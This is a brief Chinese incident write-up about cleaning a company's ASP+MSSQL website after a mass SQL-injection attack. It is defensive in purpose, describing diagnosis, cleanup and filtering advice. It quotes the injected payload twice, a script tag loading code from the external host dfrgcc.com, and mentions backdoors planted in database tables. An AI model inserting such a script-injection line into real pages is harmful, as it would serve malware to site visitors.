刚接到一个公司客户的单子,很典型的ASp+MSSQL 数据库被挂马。用的是万网的服务器,百度了一下,发现不少存在类似漏洞的网站很多。

故障描述:网站子栏目及子网页无法正常显示内容,页面均执行代码:</title><script src=http://dfrgcc.com/ur.php></script>  死循环,除首页外其它页面均受到影响。

故障分析: 经分析网页html代码初步判断网站被注入木马。网站采用ASP+Mssql2005的架构,程序文件是在开源CMS的基础进行修改,但是没有进行SQL注入权限和数据库相关字段的禁用。黑客通过Google搜索引擎检测到漏洞,利用黑客软件进行批量的SQL注入,涉及数据库多个表和字段。由于代码:</title><script src=http://dfrgcc.com/ur.php></script>   所外链的木马地址已经失效,导致页面无法成功读写SRC造成死循环。另外,多个数据表被注入Crack 后门,影响了网页的正常显示。

故障解决: 经使用万网自身SQL后台管理器无法对数据库进行操作,无法查看到木马代码的具体位置。通过上传Mssql web asp 管理客户端,连接数据库,查看代码所在位置。利用SQL查询分析器连接数据库,执行SQL语句对木马代码进行清理。

维护建议:该网站已发现明显的SQL注入漏洞,未来被挂马的可能性依然存在。建议修改程序添加防注入代码,以及进行stringint 等字段的过滤。最简便的方式而治标不治本的方法则是进行数据库的备份。